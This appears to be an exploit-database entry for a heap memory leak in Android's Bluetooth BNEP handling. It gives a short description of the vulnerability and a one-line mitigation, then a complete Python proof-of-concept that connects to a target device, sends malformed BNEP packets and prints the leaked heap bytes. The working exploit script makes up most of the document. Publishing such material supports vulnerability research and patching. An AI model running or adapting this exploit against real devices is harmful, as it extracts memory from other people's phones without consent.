Bluetooth Network Encapsulation Protocol (BNEP) Heap Leak

vendor:

N/A

by:

N/A

7.8

CVSS

HIGH

Heap Leak

119

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

Bluetooth Network Encapsulation Protocol (BNEP) Heap Leak

This vulnerability is a heap leak in the Bluetooth Network Encapsulation Protocol (BNEP) which allows an attacker to leak bytes from the heap of com.android.bluetooth. The vulnerability is caused by a lack of proper validation of the length field in the BNEP packet. An attacker can send a BNEP packet with a length field greater than BNEP_FILTER_MULTI_ADDR_RESPONSE_MSG (0x06) and the response sent by bnep_send_command_not_understood() will contain 3 bytes: 0x01 (BNEP_FRAME_CONTROL) + 0x00 (BNEP_CONTROL_COMMAND_NOT_UNDERSTOOD) + leaked byte.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all BNEP packets are properly validated before being processed.

Source

Exploit-DB raw data:

import os
import sys
import struct

import bluetooth

BNEP_PSM = 15
BNEP_FRAME_COMPRESSED_ETHERNET = 0x02
LEAK_ATTEMPTS = 20

def leak(src_bdaddr, dst):

    bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bnep.settimeout(5)
    bnep.bind((src_bdaddr, 0))
    print 'Connecting to BNEP...'
    bnep.connect((dst, BNEP_PSM))
    bnep.settimeout(1)
    print 'Leaking bytes from the heap of com.android.bluetooth...'

    for i in range(LEAK_ATTEMPTS):
        # A byte from the heap at (p + controlled_length) will be leaked
        # if it's greater than BNEP_FILTER_MULTI_ADDR_RESPONSE_MSG (0x06).
        # This BNEP packet can be seen in Wireshark with the following info:
        # "Compressed Ethernet+E - Type: unknown[Malformed packet]".
        # The response sent by bnep_send_command_not_understood() contains 3 bytes:
        # 0x01 (BNEP_FRAME_CONTROL) + 0x00 (BNEP_CONTROL_COMMAND_NOT_UNDERSTOOD) + leaked byte

        # 0x82 & 0x80 == 0x80 -> Extension flag = True. 0x82 & 0x7f == 0x2 -> type
        type_and_ext_present = BNEP_FRAME_COMPRESSED_ETHERNET | 0x80

        # 0x80 -> ext -> we need to pass this check: !(ext & 0x7f)
        ext = 0x80

        # i -> length (the 'p' pointer is advanced by this length)

        bnep.send(struct.pack('<BBB', type_and_ext_present, ext, i))
        try:
            data = bnep.recv(3)
        except bluetooth.btcommon.BluetoothError:
            data = ''

        if data:
            print 'heap[p + 0x%02x] = 0x%02x' % (i, ord(data[-1]))
        else:
            print 'heap[p + 0x%02x] <= 6' % (i)

    print 'Closing connection.'
    bnep.close()


def main(src_bdaddr, dst):
    os.system('hciconfig %s sspmode 0' % (src_bdaddr,))
    os.system('hcitool dc %s' % (dst,))

    leak(src_bdaddr, dst)


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python bnep01.py <src-bdaddr> <dst-bdaddr>')
    else:
        if os.getuid():
            print 'Error: This script must be run as root.'
        else:
            main(sys.argv[1], sys.argv[2])